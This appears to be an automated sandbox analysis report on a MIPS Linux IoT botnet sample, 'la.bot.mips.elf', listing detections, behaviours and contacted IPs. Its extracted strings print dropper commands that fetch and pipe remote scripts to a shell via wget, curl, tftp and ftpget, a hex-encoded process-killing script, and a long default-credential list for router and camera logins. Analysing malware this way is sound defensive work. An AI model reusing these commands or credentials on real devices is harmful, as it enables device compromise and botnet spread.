Linux Analysis Report
la.bot.mips.elf

Overview

General Information

Sample name: la.bot.mips.elf
Analysis ID: 1541781
MD5: 517e4b2fd02c9f6df20ce90a9b7e1c9c
SHA1: 87bdfe7c5f2c698c0cddcfec399a476c53b864e4
SHA256: cb4a412b5c47b4cf394f7e2b08541d74d06d2265ce501f1432a7cd87021cc343
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 68
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Deletes system log files
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: la.bot.mips.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: la.bot.mips.elf ReversingLabs: Detection: 39%
Source: la.bot.mips.elf Virustotal: Detection: 38% Perma Link
Found strings indicative of a multi-platform dropper
Source: la.bot.mips.elf String: ash|login|wget|curl|tftp|ntpdate
Source: la.bot.mips.elf String: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.mips.elf String: /proc//exe|ash|login|wget|curl|tftp|ntpdate/mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.mips.elf String: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking
barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 103.253.147.242 ports 54123,1,2,3,4,5
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.14:47558 -> 103.253.147.242:54123
Sample listens on a socket
Source: /tmp/la.bot.mips.elf (PID: 5515) Socket: 127.0.0.1:1234 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 84.172.6.196
Source: unknown TCP traffic detected without corresponding DNS query: 84.172.6.196
Source: unknown TCP traffic detected without corresponding DNS query: 81.56.71.195
Source: unknown TCP traffic detected without corresponding DNS query: 81.56.71.195
Source: unknown TCP traffic detected without corresponding DNS query: 202.74.211.74
Source: unknown TCP traffic detected without corresponding DNS query: 202.74.211.74
Source: unknown TCP traffic detected without corresponding DNS query: 196.25.130.60
Source: unknown TCP traffic detected without corresponding DNS query: 196.25.130.60
Source: unknown TCP traffic detected without corresponding DNS query: 198.243.9.122
Source: unknown TCP traffic detected without corresponding DNS query: 198.243.9.122
Source: unknown TCP traffic detected without corresponding DNS query: 27.72.52.234
Source: unknown TCP traffic detected without corresponding DNS query: 27.72.52.234
Source: unknown TCP traffic detected without corresponding DNS query: 48.229.94.153
Source: unknown TCP traffic detected without corresponding DNS query: 48.229.94.153
Source: unknown TCP traffic detected without corresponding DNS query: 190.102.126.210
Source: unknown TCP traffic detected without corresponding DNS query: 190.102.126.210
Source: unknown TCP traffic detected without corresponding DNS query: 90.136.8.152
Source: unknown TCP traffic detected without corresponding DNS query: 90.136.8.152
Source: unknown TCP traffic detected without corresponding DNS query: 147.78.65.77
Source: unknown TCP traffic detected without corresponding DNS query: 147.78.65.77
Source: unknown TCP traffic detected without corresponding DNS query: 176.0.0.155
Source: unknown TCP traffic detected without corresponding DNS query: 176.0.0.155
Source: unknown TCP traffic detected without corresponding DNS query: 144.234.126.19
Source: unknown TCP traffic detected without corresponding DNS query: 155.66.204.83
Source: unknown TCP traffic detected without corresponding DNS query: 144.234.126.19
Source: unknown TCP traffic detected without corresponding DNS query: 65.217.146.100
Source: unknown TCP traffic detected without corresponding DNS query: 155.66.204.83
Source: unknown TCP traffic detected without corresponding DNS query: 65.217.146.100
Source: unknown TCP traffic detected without corresponding DNS query: 199.141.205.97
Source: unknown TCP traffic detected without corresponding DNS query: 199.141.205.97
Source: unknown TCP traffic detected without corresponding DNS query: 107.139.81.216
Source: unknown TCP traffic detected without corresponding DNS query: 107.139.81.216
Source: unknown TCP traffic detected without corresponding DNS query: 176.109.13.51
Source: unknown TCP traffic detected without corresponding DNS query: 176.109.13.51
Source: unknown TCP traffic detected without corresponding DNS query: 94.189.241.70
Source: unknown TCP traffic detected without corresponding DNS query: 94.189.241.70
Source: unknown TCP traffic detected without corresponding DNS query: 47.61.32.211
Source: unknown TCP traffic detected without corresponding DNS query: 181.253.25.134
Source: unknown TCP traffic detected without corresponding DNS query: 47.61.32.211
Source: unknown TCP traffic detected without corresponding DNS query: 85.244.226.228
Source: unknown TCP traffic detected without corresponding DNS query: 181.253.25.134
Source: unknown TCP traffic detected without corresponding DNS query: 176.178.76.64
Source: unknown TCP traffic detected without corresponding DNS query: 85.244.226.228
Source: unknown TCP traffic detected without corresponding DNS query: 99.252.160.38
Source: unknown TCP traffic detected without corresponding DNS query: 176.178.76.64
Source: unknown TCP traffic detected without corresponding DNS query: 52.115.133.41
Source: unknown TCP traffic detected without corresponding DNS query: 99.252.160.38
Source: unknown TCP traffic detected without corresponding DNS query: 82.157.74.101
Source: unknown TCP traffic detected without corresponding DNS query: 52.115.133.41
Source: unknown TCP traffic detected without corresponding DNS query: 82.157.74.101
Source: global traffic DNS traffic detected: DNS query: nineteen.libre
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: la.bot.mips.elf String found in binary or memory: http:///curl.sh
Source: la.bot.mips.elf String found in binary or memory: http:///wget.sh
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: usage: busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample String containing 'busybox' found: /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sample String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sample String containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sample String containing 'busybox' found: (usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sample String containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/la.bot.mips.elf (PID: 5537) SIGKILL sent: pid: 940, result: successful Jump to behavior
Source: classification engine Classification label: mal68.troj.evad.linELF@0/0@3/0

Data Obfuscation
barindex
Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
Source: /tmp/la.bot.mips.elf (PID: 5539) File: /etc/config Jump to behavior
Creates hidden files and/or directories
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /root/.cache Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /root/.ssh Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /root/.config Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /root/.local Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /tmp/.X11-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /tmp/.Test-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /tmp/.font-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /tmp/.ICE-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /tmp/.XIM-unix Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5539) Directory: /etc/.java Jump to behavior
Enumerates processes within the "proc" file system
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/110/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/111/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/112/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/113/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/234/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/114/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/235/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/115/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/116/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/117/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/118/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/119/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/10/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/917/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/11/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/12/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/13/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/14/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/15/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/16/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/17/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/18/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/19/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/240/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/120/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/121/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/242/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/1/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/122/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/243/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/2/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/123/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/244/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/3/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/124/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/245/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/125/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/4/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/246/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/126/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/5/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/247/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/127/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/6/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/248/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/128/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/7/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/249/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/8/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/129/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/800/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/9/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/801/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/803/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/20/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/806/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/21/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/807/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/928/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/22/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/23/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/24/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/25/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/26/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/27/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/28/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/29/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/490/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/250/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/130/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/251/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/131/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/252/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/132/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/253/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/254/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/255/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/135/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/256/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/257/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/378/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/258/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/259/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/30/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/35/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/260/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/261/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/262/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/142/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/263/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/264/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/265/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/145/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/266/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/267/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/268/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/269/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/940/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/270/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/271/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/272/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/273/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/274/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/275/fd Jump to behavior
Source: /tmp/la.bot.mips.elf (PID: 5537) File opened: /proc/276/fd Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes system log files
Source: /tmp/la.bot.mips.elf (PID: 5539) Log files deleted: /var/log/kern.log Jump to behavior
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/la.bot.mips.elf (PID: 5515) Queries kernel information via 'uname': Jump to behavior
Source: la.bot.mips.elf, 5515.1.00007ffd293f0000.00007ffd29411000.rw-.sdmp Binary or memory string: ,x86_64/usr/bin/qemu-mips/tmp/la.bot.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.mips.elf
Source: la.bot.mips.elf, 5515.1.00005598428b8000.000055984295f000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/mips
Source: la.bot.mips.elf, 5515.1.00005598428b8000.000055984295f000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/mips
Source: la.bot.mips.elf, 5515.1.00007ffd293f0000.00007ffd29411000.rw-.sdmp Binary or memory string: /usr/bin/qemu-mips
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.240.50.71
 unknown United Kingdom
3549 LVLT-3549US false
210.85.225.107
 unknown Taiwan; Republic of China (ROC)
7482 APOL-ASAsiaPacificOn-lineServiceIncTW false
158.236.98.35
 unknown United States
1540 DNIC-ASBLK-01534-01546US false
173.143.209.138
 unknown United States
10507 SPCSUS false
109.88.160.254
 unknown Belgium
12392 ASBRUTELEVOOBE false
17.164.1.184
 unknown United States
714 APPLE-ENGINEERINGUS false
35.244.228.221
 unknown United States
15169 GOOGLEUS false
150.128.236.59
 unknown Spain
766 REDIRISRedIRISAutonomousSystemES false
40.41.62.89
 unknown United States
4249 LILLY-ASUS false
174.27.64.72
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
130.235.216.129
 unknown Sweden
2846 LundUniversitySE false
187.163.101.180
 unknown Mexico
6503 AxtelSABdeCVMX false
175.114.168.150
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
183.62.106.48
 unknown China
4816 CHINANET-IDC-GDChinaTelecomGroupCN false
30.83.105.11
 unknown United States
7922 COMCAST-7922US false
216.161.55.99
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
109.83.31.75
 unknown Saudi Arabia
34400 ASN-ETTIHADETISALATSA false
195.44.68.16
 unknown United Kingdom
1273 CWVodafoneGroupPLCEU false
111.26.45.172
 unknown China
134810 CMNET-JILIN-AS-APChinaMobileGroupJiLincommunicationsco false
109.136.212.148
 unknown Belgium
5432 PROXIMUS-ISP-ASBE false
173.208.128.129
 unknown United States
32097 WIIUS false
15.52.187.210
 unknown United States
13979 ATT-IPFRUS false
154.49.208.177
 unknown United States
174 COGENT-174US false
21.231.209.3
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
215.128.179.45
 unknown United States
721 DNIC-ASBLK-00721-00726US false
203.51.132.83
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
24.167.229.135
 unknown United States
10796 TWC-10796-MIDWESTUS false
6.160.184.190
 unknown United States
3356 LEVEL3US false
91.246.74.233
 unknown Poland
42673 SKYWARE-ASPL false
56.168.91.91
 unknown United States
2686 ATGS-MMD-ASUS false
180.15.74.189
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
193.81.22.228
 unknown Austria
1901 EUNETAT-ASA1TelekomAustriaAGAT false
39.187.255.114
 unknown China
56041 CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC false
140.43.67.40
 unknown United States
668 DNIC-AS-00668US false
149.170.117.77
 unknown United Kingdom
786 JANETJiscServicesLimitedGB false
189.18.34.184
 unknown Brazil
27699 TELEFONICABRASILSABR false
198.204.160.210
 unknown United States
62445 AS-62445RO false
71.139.17.127
 unknown United States
7018 ATT-INTERNET4US false
21.108.86.218
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
125.189.57.249
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
38.89.76.161
 unknown United States
174 COGENT-174US false
14.138.189.163
 unknown Korea Republic of
9943 KNCTV-ASKangNamCableTVKR false
161.101.254.207
 unknown United States
7582 UMAC-AS-APUniversityofMacauMO false
52.57.154.1
 unknown United States
16509 AMAZON-02US false
220.58.13.30
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
146.199.220.222
 unknown United States
6871 PLUSNETUKInternetServiceProviderGB false
88.26.86.231
 unknown Spain
3352 TELEFONICA_DE_ESPANAES false
183.54.199.127
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
52.157.96.0
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
58.118.75.110
 unknown China
4847 CNIX-APChinaNetworksInter-ExchangeCN false
213.155.252.66
 unknown Czech Republic
31246 NETBOX-ASNETBOXAutonomoussystemCZ false
170.78.76.188
 unknown Brazil
28250 TELBRAXLTDABR false
78.45.222.105
 unknown Czech Republic
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding false
152.2.11.89
 unknown United States
36850 UNC-CHUS false
19.227.203.142
 unknown United States
3 MIT-GATEWAYSUS false
27.232.209.211
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
197.167.21.18
 unknown Egypt
24863 LINKdotNET-ASEG false
178.204.169.151
 unknown Russian Federation
28840 TATTELECOM-ASRU false
8.76.232.103
 unknown United States
3356 LEVEL3US false
219.147.12.207
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
14.36.73.95
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
169.63.144.250
 unknown United States
36351 SOFTLAYERUS false
219.227.236.155
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
31.187.128.228
 unknown Netherlands
50266 TMOBILE-THUISNL false
164.117.20.14
 unknown United States
494 AFCONC-BLOCK1-ASUS false
222.46.86.239
 unknown China
9394 CTTNETChinaTieTongTelecommunicationsCorporationCN false
56.145.15.243
 unknown United States
2686 ATGS-MMD-ASUS false
5.198.240.144
 unknown Jordan
9038 BAT-AS9038JO false
222.35.64.142
 unknown China
24138 CTTNETChinaTieTongTelecommunicationsCorporationCN false
82.75.105.24
 unknown Netherlands
